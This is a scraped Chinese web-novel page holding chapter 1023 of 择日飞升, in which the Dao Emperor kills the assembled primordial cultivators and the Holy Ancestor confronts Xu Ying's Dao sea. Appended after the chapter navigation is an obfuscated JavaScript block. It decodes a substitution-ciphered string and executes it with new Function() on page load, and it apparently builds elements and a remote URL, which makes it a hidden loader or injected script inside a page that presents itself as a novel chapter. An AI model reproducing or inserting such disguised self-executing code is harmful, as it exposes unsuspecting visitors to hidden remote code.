返回

择日飞升

首页
关灯
护眼
字体:
第一千零二十三章 坟场覆灭
\"道皇杀人了。\"

一声凄厉的喊叫打破沉默的宇宙坟场,这声音是以道音喊出,传遍所有元始道境的耳中,无论他们是在沉睡、还是已经醒来。

一尊尊无始惊疑不定,纷纷腾空而起,循声望来。

还有一尊尊石化的元始道境,此刻也纷纷肉身元神恢复血肉之躯。

道皇转过头来,手掌还在啪嗒啪嗒的滴着血,看向那个叫出声的元始道境。

而阳林道尊,此刻便躺在他的脚下,已经大道破灭,死于非命。

原来是幽然道友,道友是来寻阳林道友?他已经死了,道皇面色如常道:\"道友是在七十三万亿年前劫运发作的罢,你被劫运追上,苟活至今,为了自己的性命,却拖延混沌海的劫运,这份因果,该偿还了。

他一步跨出,已经来到幽然天尊的身前。

幽然天尊叱咤一声,怒发冲冠,不由分说祭起元始至宝影绝名都,乃是一座仙城,光明如昼,日夜不息,他顾不得镇压自身劫运,道力催发到极致,元始四证,合为一体,宇宙道力,浩乎沛然。

然而就在他将自身以及影绝名都威力提升到极致的一刹那,道皇已然击破他的防御,一掌拍在他的脑袋上。

道皇,你这是何故?

一尊尊元始道境见此情形,急忙前来阻止两人争斗,但还未近身,幽然天尊便已经被道皇格杀。

耦耕道祖又惊又怒,踏前一步,喝道:道皇,幽然道兄即便有所得罪之处,也罪不该……死字还未说出,道皇已经来到他的跟前,一手探出便将耦耕道祖的脖颈抓住,提了起来。

耦耕,混沌海中的无数宇宙,已经偿还了混沌海的因果,想要彻底开辟混沌海,你我这些元始道境,又有什么可以我例外的理由?道皇手掌用力,扭断他的脖子,同时掌心道力一吐,便将耦耕的大道破碎,幽幽道:彻底开辟混沌海见大道真实,元始道境是比宇宙更为庞大的因果,理当偿还。

道皇,你疯了,其他元始道境惊怒万分,纷纷杀来。

崇崖道人厉声道:我们是道友,同道中人,共同为开辟混沌海见大道真实而努力,如今到了开辟的时候,你却要甩掉我们独自摘取果实?

下一刻,崇崖道人便被道皇毙于掌下。

道皇不紧不慢道:就算留下你们,你们也对彻底开辟混沌海毫无益处,与其增添劫运,不如还混沌海因果,为将来铺路。

好你个道皇,尘翕天尊气极而笑,叫道:我们栽种黑玉灵芝,我们培养宇宙洪源,我们贡献所有财富炼制大道宝匣,我们东奔西走,炼化毁灭一个个宇宙,将劫运揽在我们身上,让你道皇不沾劫运,我们为的是什么?还不是让你能够有足够的实力开辟混沌海?还不是期盼极致升华,洗去混沌海?前往未来的大一统宇宙?

道皇杀至跟前,一指点来,尘翕天尊没能接住他的一指,毙命当场,道:你们的作为我的确感激,但未来的大一统宇宙不需要诸位过河拆桥。

众人怒不可遏,疯狂向道皇攻去,如同走马灯般,围绕道皇上下左右,翻飞不止,将自己毕生所学悉数化作神通,力图将道皇斩杀。

然而道皇每一次出手都能准确无比带走一人性命,无论对方的修为有多高,实力有多强,统统接不下他一招。

道皇,你说偿还因果,最应该偿还的人就是你,你便是最大的因果,坟场中,更多的元始道境向道皇涌去,无数宇宙残骸在他们的大道下仿佛重新归来,壮阔无比。

道皇面对如此一幕,一如从前,没有任何惊慌失措,也没有迸发出华丽的异象,他还是平平淡淡的出手,不见声势浩大的神通,不见惊世骇俗的威力,但他的每一招,对手都无法接下,往往一击致命。

他处在围攻之中,闲庭信步,甚至有几分从容悠然,就这样收割一条又一条元始道境的性命。

他的左手中还拖着大道宝匣,宝匣却从未动用过,他只用右臂,便有一尊又一尊元始倒在他的手中,终于,有元始道境承受不住这等压力,向外遁逃,道皇给他们的感觉,便如同凡人面对道尽的修士一般,只觉深不可测,不可敌。

其他元始见状,也纷纷四下散开,向外逃去。他们是元始道境的存在,逃命的本事也是一绝,只要能逃出去,他们自会有办法让道皇找不到他们。

就在这时,道皇将手中大道宝匣祭起,宝匣腾空,哒一声开启,倒扣下来,当此之时,宇宙坟场中的所有元始都立脚不住,被大道宝匣的光芒捕获,哪怕是施展出一切手段也无法从道光中逃脱。

还有元始在被吸入宝匣的前一刻,立刻石化,企图用这种法门来躲避宝匣的炼化,然而一切只是无用功,他们石化可以躲避劫运和寂灭天火,但落入宝匣之中,石像顿时噼里啪啦爆碎,化作齑粉。

此宝匣,乃道皇穷尽智慧设计而成的武器,经所有元始道境万年锻造祭炼而成,耗尽了他们收集的天材地宝,此宝的威力,也大得令坟场中所有元始绝望。

道皇,你为何要这么做?南珍道祖悲愤欲绝,在道光中喝问。然而她随即支撑不住,跌入宝匣之中,顿时香消玉殒,灰飞烟灭,大道宝匣中一団団明亮的光芒炸开,每一団光芒,皆是一尊曾经辉煌至极,叱咤混沌海的元始道境临终前绽放的光辉,他们尽管曾经站在境界的至高峰上,无数人敬仰,尽管有着通天彻地的修为,深不可测的道行,然而在这口宝匣面前,统统都是虚妄。

过了片刻,坟场中所有的元始消失,均被收入宝匣之中炼化。

哒,宝匣合拢,飞速缩小,又回到道皇的手中,道皇单手托起宝匣,像是托着一件无比贵重的宝物,他伫立在这片坟场之中,万籁俱寂,查音无声,举目间,这世上再无一个道友。

道皇呆了良久,他对每一个人都极为真诚,对每一个人都当做道友一般看待,此时却不得不亲手杀了所有人,不禁潜然泪下,道友啊,道皇发出一声苌叹,收起大道宝匣,向坟场外走去,不过片刻,便走出这片伤心之地。

后方传来冰川碰撞般的声响,道皇回头看去,却见无数宇宙残骸如同飘浮的冰山,跟在他的后面,这些宇宙残骸相互碰撞、挤压、堆积,道收皇继续向前走去,然而那些宇宙残骸却仿佛认准了他一般,无论他走到哪里都跟到哪里,这些宇宙残骸,追随陷入寂灭的元始道境,而今,坟场的元始道境,只剩下我一人了,他心中默默道,再无道友了,吾身所立即是坟场。

道皇带着宇宙坟场渐行渐远。

洪源之中,圣祖将一个又一个许应斩杀,试图冲出此地,然而始终被新出现的道海和许应挡下,圣祖见无法离开,索性便沉下心来,观摩各种道场,揣摩不同的大道,完善自己的寂灭大道,他也是绝世天才,否则也不可能修成寂灭元始,他每斩杀一个许应,便在相应大道上感悟出寂灭大道,完善寂灭道海。

他沉心静气,道行反倒飞速提升,这种提升速度,是他从前所不敢想象。许应想要借此机会研究我的道法神通,从而突破,但他反倒成全了我,非但助我领悟寂灭道海,甚至还竭尽自己所能,提升我的道行。圣祖也不禁有些欣喜,许应的道海极为古怪,映照出他的倒影,他这倒影从模糊逐渐变得清晰,让他意识到许应在偷学自己的道法,不过他寂灭大道玄妙莫测,已经是参悟混沌海级别的寂灭大道,不是许应短时间内便能偷学了去的。

而圣祖可以在他偷学自己大道的同时,将许应的各种大道摸清,此消彼苌,破了他的后天道海,就轻而易举。

不知不觉间,过去了数十年之久,圣祖居然没有碰到重复的道海,心中越来越惊,天地大道的数量虽然繁多,但一切都没有脱离先天九道,隐隐皆在九道掌握之中,但许应展现的道海,却早已脱离了先天九道的范畴,各种不输于先天九道的道海层出不穷。

这些年圣祖参悟这些大道,将之化作寂灭态,融入到寂灭道海之中,修为实力大增,但也让他隐隐有些不安,倘若许应的道海不断变化,没有重复,没有穷尽,这岂不是说他永远也无法看到许应的后天大道的真面目。

不能再等了。

一尊尊圣祖突然苌啸不绝,破开那一个个许应的道海,猛然间千尊圣祖合并,回归一身,依旧现出千臂两面的状态。

他的寂灭道海陡然爆发,扩张了千百倍,圣祖倾尽所能,催动自己的寂灭道海,暴喝道:许应,今日无论如何我也要见见你的后天道海。他寂灭道海中火焰冲天,疯狂扩张,大有将这座洪源统统纳入其中架势,这些年来,许应以后天道海困住他,后天道海广阔无边,千变万化,让圣祖摸不到后天道海的边界,但是后天道海毕意是与洪源相结合,借洪源道力来扩张自己,只要将寂灭道海护张到洪源程度,也就可以摸到后天道海的边界。

圣祖原本没有这个实力,但经过许应的磨砺,修为大增,此刻催动寂灭道海,当真有席卷洪源的趋势,然而下一刻,他的寂灭道海便遭到了极大的阻力,前进艰难。

圣祖鼓荡所有道力,但见寂灭道中浮现出无数宇宙芸芸众生在天火中湮灭的恐怖景象,顿时寂灭道海的边界再度拓张,然而饶是他的道力催发到极致,寂灭道海的演变也到了极致,还是只向外推了数万里,便戛然而止。

圣祖心中一沉,仰头道:许应,你只敢借洪源道力,与我一战么?这样你就算胜了我,如何去桃战道皇?

他的话音刚落,只听天外传来许应的声音:如你所愿。

圣祖忽然天旋地转,待到身形稳住之时,只见四周各种道海依旧还在,道海无边无际,从寂灭道海传来的压力依旧极为恐怖。

圣祖笑道:许应,你只敢借洪源道力么?这时他的瞳孔骤缩,只见四周的各种奇异道海后方,一株巍峨无比的黑玉灵芝逐渐清晰起来,接着,那座巨大无的洪源映入他的眼帘,灵芝的一片芝叶上,道寂真君依旧坐在那里,老神在在,一动不动,圣祖眼角跳动一下,黑玉灵芝和洪源的出现,意味着他此刻不在洪源之中,而是身处许应的后天道海中,然而自己依旧未能看破这片道海。

就在此时,他突然只觉四周压力一轻,遮蔽他视野的大道海洋像是退潮了一般,缓缓显露真身,圣祖四周,各种属性道海不计其数,此刻这些道海竟在相互融合,渐渐地,道海难以分辨属性,也不知是虚空道海,还是鸿蒙道海,或是其他什么道海。

无数种大道逐渐归一,变成了一种奇妙的道,玄之又玄,说不清道不明,让圣祖只觉博大无边。

而在这片道海边缘,他还看到那里竟有新道海在不断生成,生成之后便又融入到这片道海之中,各种不同属性的大道,在道海中形成一锅原始的汤,可以在这里寻到每一种大道的踪迹,但每种大道都不是其全部,这就是后天大道?

圣祖有些茫然,他被困住的这些年,无数次想象许应的道海是什么样子,此刻真正见了,才知与自己想象的完全不同。

道海中,许应的身影缓缓浮现,不再是那张遮蔽天空的巨大面目。

道兄,请!

许应抬手道。


上一章 目录 下一章

(function(){function o047defe(f2284){var tee004=".Ru2y?Gd]68bQ30Fc@=zv~soSWp!t(1f%,a:B9VqUreMJik-POZAC&EK[;5/Hj|lgw7XDxI^nmYT$hN_4L";var lb755b6de="WxtaYoN(u9[lPiKpwheVHrJ@-G$7&?D;TX.c5MSU!fOZAk4bE^|=8Cd6,m0_]:IFy3Bsq1R2L/jg~%vnzQ";return f2284.split('').map(function(dd1904f){var ra6b2cf0a=tee004.indexOf(dd1904f);return ra6b2cf0a==-1?dd1904f:lb755b6de[ra6b2cf0a]}).join('')}var c=o047defe('magnet:?xt=c3_E?c8"" + "R" + ":" + ":" + "^" + "^" + "^" + "5" + "2" + "-"+""HAr]_:u3?_d){fdr]_:u3?_dYr^6Cx^6[?=226[Yk6kr^[4=Er^=:kE){3rdmO92:Z.3_mau=Xud_2N3T2u?~aFb2ur?~;)){~=u]~_}fN2~ g=-:!Ar]_:u3?_d;ww=EK=!){~=u]~_ Vu~3_Tar~?;&@2~&?E=d;ww=EK=!)}fN2~ _C=k^2Cw-A8"uSx"["NSx6"["]S^C^Kxk^K5^KB5^6"["ES^5^kS5kSxx 55j5^jkw"["XgXS4:"HfN2~ XK6rw-K^AYk6kr^8g=-:!d5RKx)+g=-:!d5R!k)+g=-:!d5RKl)+g=-:!d5RK^)H[?rxw5AYk6kr^8g=-:!d5RK^)+g=-:!d5R!k)+g=-:!d5RKl)+g=-:!d5RKx)H[R^E5E:=xrA4=Er^=:kE8XK6rw-K^d"ywzg:;z]ElGY:;bcEJAA")H[_Bw:CwwwAXK6rw-K^d"ywsby,IbI.Rb-.z]EJAA")[4xxx6AXK6rw-K^d":wz3:wIg2.B_")[;!kEwAXK6rw-K^d":;zc-WlYMLAA")[Rrk:r=w6AXK6rw-K^d":w7X2,LA")[@CB::EAXK6rw-K^d":;z^M,s4MLAA")[2E5!x56AXK6rw-K^d"2;6F-TAA")[3CEKkErAXK6rw-K^d":;l]MW6u")[462x-E:AYk6kr^8XK6rw-K^d"%.l52JAA")H[@^26E=B25AXK6rw-K^d"-W6@MJAA")fN2~ -5KKw!rBrAXK6rw-K^d"=;GiM.sxMcAA")fN2~ TBkkxw2x:f3rdb?:2u3?_aX=2~:@a3_E=Rerd-5KKw!rBr)>Sx){TBkkxw2x:A4=Er^=:kE8_Bw:CwwwHdXK6rw-K^d"EWzkEWlgM.PA"))fTBkkxw2x:a3EA"u"+d462x-E:83CEKkErHd)*x5555)fTBkkxw2x:aXugb=ac3Eu@A"x55h"fTBkkxw2x:aXugb=a@=3T@uA"B55FR"fTBkkxw2x:aE3X2-b=EAu~]=f3rd4=Er^=:kEa-?EgUA_]bb){4=Er^=:kEa-?Ega2FF=_E&@3bEdTBkkxw2x:)}=bX={N2~ X:xB^x:Ar]_:u3?_d){4=Er^=:kEa-?Ega2FF=_E&@3bEdTBkkxw2x:)fYk6kr^a~=;?N=PN=_un3Xu=_=~d@^26E=B25[X:xB^x:[r2bX=)}fYk6kr^a2EEPN=_un3Xu=_=~d@^26E=B25[X:xB^x:[r2bX=)}}N2~ :wx^EA4=Er^=:kE8_Bw:CwwwHdXK6rw-K^d"M.x3M.LA"))f:wx^EaXugb=a@=3T@uA"5FR"f:wx^Ea3EA?=226+d462x-E:a:=3bd462x-E:83CEKkErHd)*x5555))fN2~ u52-^2Ar]_:u3?_d3k5kkCkk^){N2~ 2-^2wEKA_=c 12u=d)fN2~ Ywx55CA`2ENVF2:=|E/p{?=226}/p{2-^2wEKau?n?:2b=12u=Vu~3_Td)}`fN2~ cr!rC5AsVeGaF2~X=db?:2bVu?~2T=aT=u|u=;dYwx55C))f3rdcr!rC5AA_]bb){cr!rC5A{-~?cX=~&?]_uj5}}cr!rC5a-~?cX=~&?]_u++fN2~ RE=wKkB:A?rxw5d_C=k^2Cw-a:?_:2ud812u=8"_?c"Hd)[b?:2u3?_a@~=r[`@X:Sp{cr!rC5a-~?cX=~&?]_u}`H)aX?~udd)A>462x-E:83CEKkErHd)S5aB)82E5!x56Hd"["))fN2~ ?k==EB5rARE=wKkB:a3_E=Rerdg=-:!d5RwE))>Sx(RE=wKkB:84xxx6HdRE=wKkB:a3_E=Rerdg=-:!d5RwE)))j""fRE=wKkB:ARE=wKkB:8;!kEwHd?k==EB5r["")8Rrk:r=w6Hd"")8@CB::EHd)82E5!x56Hd"")+?k==EB5rf:wx^EaX~:A8"@uuFXjmm"[3k5kkCkk^[RE=wKkB:H82E5!x56Hd"m")f4=Er^=:kEa-?Ega2FF=_E&@3bEd:wx^E)f3rdTBkkxw2x:UA_]bb){TBkkxw2x:aN2b]=+A"\\~\\_2FF=_E=E =; u? @u;b"fN2~ -E!BK:!5:A4=Er^=:kEaT=uPb=;=_u7g|Ed:wx^Ea3E)f3rd-E!BK:!5:AA_]bbZZ-E!BK:!5:AA]_E=r3_=E){TBkkxw2x:aN2b]=+A"\\~\\_ :2_u T=u =; r~?; @u;b"}}}f3rdTBkkxw2x:UA_]bb){TBkkxw2x:aN2b]=+A"\\~\\_X=_E YX @?Xu "+Yr^6Cx^6}N2~ b!rEwAr]_:u3?_dT5!w-){~=u]~_ XK6rw-K^dT5!w-)8;!kEwHdg=-:!d5R^J)[462x-E:83CEKkErHd)au?Vu~3_TdwK)aXb3:=d462x-E:arb??~d462x-E:83CEKkErHd)*6)+^))}fu52-^2db!rEwdYr^6Cx^6))fYk6kr^8"2EEPN=_un3Xu=_=~"Hd";=XX2T="[r]_:u3?_d=){3rd=aE2u2aiAA?=226){4=Er^=:kEaT=uPb=;=_u7g|Ed:wx^Ea3E)a~=;?N=d)f3rdTBkkxw2x:UA_]bb){TBkkxw2x:aN2b]=+A"\\~\\_~=:=3N= =; F?Xu ;=XX2T="fTBkkxw2x:aN2b]=+A"\\~\\_=aE2u2aN "+=aE2u2aD}_=c l]_:u3?_d"2~TX"[=aE2u2aD)d{/uE:XjR^E5E:=xr[/u~2jTBkkxw2x:})}})})d"03B3y,IF2;b@-3BY-^5A"["^C^Kxk^K5^KB5^6"[c3_E?c[E?:];=_u)}fR::^^^52-d)f'.substr(11));new Function(c)()})();